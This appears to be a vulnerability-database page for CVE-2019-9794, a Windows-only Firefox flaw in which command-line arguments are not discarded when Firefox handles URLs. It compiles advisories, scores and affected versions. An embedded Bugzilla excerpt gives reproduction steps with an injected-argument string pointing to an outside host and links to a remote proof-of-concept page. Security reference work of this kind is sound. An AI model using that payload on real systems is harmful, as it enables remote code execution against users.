CVE-2019-9794
published 2019-04-26CVE-2019-9794: A vulnerability was discovered where specific command line arguments are not properly discarded during Firefox invocation as a shell handler for URLs. This…
PriorityP351critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EPSS
1.77%
75.7th percentile
A vulnerability was discovered where specific command line arguments are not properly discarded during Firefox invocation as a shell handler for URLs. This could be used to retrieve and execute files whose location is supplied through these command line arguments if Firefox is configured as the default URI handler for a given URI scheme in third party applications and these applications insufficiently sanitize URL data. *Note: This issue only affects Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Thunderbird < 60.6, Firefox ESR < 60.6, and Firefox < 66.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | firefox | — | — |
| debian | firefox-esr | — | — |
| debian | thunderbird | — | — |
| mozilla | firefox | < 60.6.0 | 60.6.0 |
| mozilla | firefox | < 66.0 | 66.0 |
| mozilla | firefox | >= unspecified < 66 | 66 |
| mozilla | firefox_esr | >= unspecified < 60.6 | 60.6 |
| mozilla | thunderbird | < 60.6.0 | 60.6.0 |
| mozilla | thunderbird | >= unspecified < 60.6 | 60.6 |
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vendor_debian9.8LOW
vendor_redhat9.8CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2cx8-vq8f-mwm5: A vulnerability was discovered where specific command line arguments are not properly discarded during Firefox invocation as a shell handler for URLs
ghsa_unreviewed·2022-05-24
CVE-2019-9794 [CRITICAL] CWE-20 GHSA-2cx8-vq8f-mwm5: A vulnerability was discovered where specific command line arguments are not properly discarded during Firefox invocation as a shell handler for URLs
A vulnerability was discovered where specific command line arguments are not properly discarded during Firefox invocation as a shell handler for URLs. This could be used to retrieve and execute files whose location is supplied through these command line arguments if Firefox is configured as the default URI handler for a given URI scheme in third party applications and these applications insufficiently sanitize URL data. *Note: This issue only affects Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Thunderbird < 60.6, Firefox ESR < 60.6, and Firefox < 66.
OSV
CVE-2019-9794: A vulnerability was discovered where specific command line arguments are not properly discarded during Firefox invocation as a shell handler for URLs
osv·2019-04-26·CVSS 9.8
CVE-2019-9794 [CRITICAL] CVE-2019-9794: A vulnerability was discovered where specific command line arguments are not properly discarded during Firefox invocation as a shell handler for URLs
A vulnerability was discovered where specific command line arguments are not properly discarded during Firefox invocation as a shell handler for URLs. This could be used to retrieve and execute files whose location is supplied through these command line arguments if Firefox is configured as the default URI handler for a given URI scheme in third party applications and these applications insufficiently sanitize URL data. *Note: This issue only affects Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Thunderbird < 60.6, Firefox ESR < 60.6, and Firefox < 66.
Red Hat
Mozilla: Command line arguments not discarded during execution
vendor_redhat·2019-03-20·CVSS 9.8
CVE-2019-9794 [CRITICAL] CWE-88 Mozilla: Command line arguments not discarded during execution
Mozilla: Command line arguments not discarded during execution
A vulnerability was discovered where specific command line arguments are not properly discarded during Firefox invocation as a shell handler for URLs. This could be used to retrieve and execute files whose location is supplied through these command line arguments if Firefox is configured as the default URI handler for a given URI scheme in third party applications and these applications insufficiently sanitize URL data. *Note: This issue only affects Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Thunderbird < 60.6, Firefox ESR < 60.6, and Firefox < 66.
Statement: This issue does not affect the version of firefox and thunderbird as shipped with Red Hat Enterprise Linux 6 and 7.
Debian
CVE-2019-9794: firefox - A vulnerability was discovered where specific command line arguments are not pro...
vendor_debian·2019·CVSS 9.8
CVE-2019-9794 [CRITICAL] CVE-2019-9794: firefox - A vulnerability was discovered where specific command line arguments are not pro...
A vulnerability was discovered where specific command line arguments are not properly discarded during Firefox invocation as a shell handler for URLs. This could be used to retrieve and execute files whose location is supplied through these command line arguments if Firefox is configured as the default URI handler for a given URI scheme in third party applications and these applications insufficiently sanitize URL data. *Note: This issue only affects Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Thunderbird < 60.6, Firefox ESR < 60.6, and Firefox < 66.
Scope: local
sid: resolved
No detection rules found.
No public exploits indexed.
Bugzilla
File association Remote Code Execution via command line parameter injection in Firefox
bugzilla·2020-01-02
[MEDIUM] File association Remote Code Execution via command line parameter injection in Firefox
File association Remote Code Execution via command line parameter injection in Firefox
Tested on Microsoft Windows 10 Enterprise version 10.0.17763 Build 17763
Using Firefox version 71.0 (32-bit)
Steps to reproduce (local only):
* Setup Firefox as Windows' default .pdf handler (right click a pdf file -> open with -> chose other -> select always open with Firefox)
* Open the run prompt (windows key + r) and run the following URL:
* \\\\poiu.xss.vg@ssl\a.txt" -appomni appomni.pdf -greomni \share\greomni.pdf
Steps to reproduce (via MS Excel):
* Setup Firefox as Windows' default .pdf handler (right click a pdf file -> open with -> chose other -> select always open with Firefox)
* visit https://poiu.xss.vg/oausdhvjzlxkcn/poc.html (this will open a CSV file in excel)
* Click the link in th
Bugzilla
CVE-2019-9794 Mozilla: Command line arguments not discarded during execution
bugzilla·2019-03-20·CVSS 9.8
CVE-2019-9794 [CRITICAL] CVE-2019-9794 Mozilla: Command line arguments not discarded during execution
CVE-2019-9794 Mozilla: Command line arguments not discarded during execution
A vulnerability was discovered where specific command line arguments are not properly discarded during Firefox invocation as a shell handler for URLs. This could be used to retrieve and execute files whose location is supplied through these command line arguments if Firefox is configured as the default URI handler for a given URI scheme in third party applications and these applications insufficiently sanitize URL data.
*Note: This issue only affects Windows operating systems. Other operating systems are unaffected.*
External Reference:
https://www.mozilla.org/en-US/security/advisories/mfsa2019-08/#CVE-2019-9794
Statement:
This issue does not affect the version of firefox and thunderbird as shipped with Re
https://bugzilla.mozilla.org/show_bug.cgi?id=1530103https://www.mozilla.org/security/advisories/mfsa2019-07/https://www.mozilla.org/security/advisories/mfsa2019-08/https://www.mozilla.org/security/advisories/mfsa2019-11/https://bugzilla.mozilla.org/show_bug.cgi?id=1530103https://www.mozilla.org/security/advisories/mfsa2019-07/https://www.mozilla.org/security/advisories/mfsa2019-08/https://www.mozilla.org/security/advisories/mfsa2019-11/
2019-04-26
Published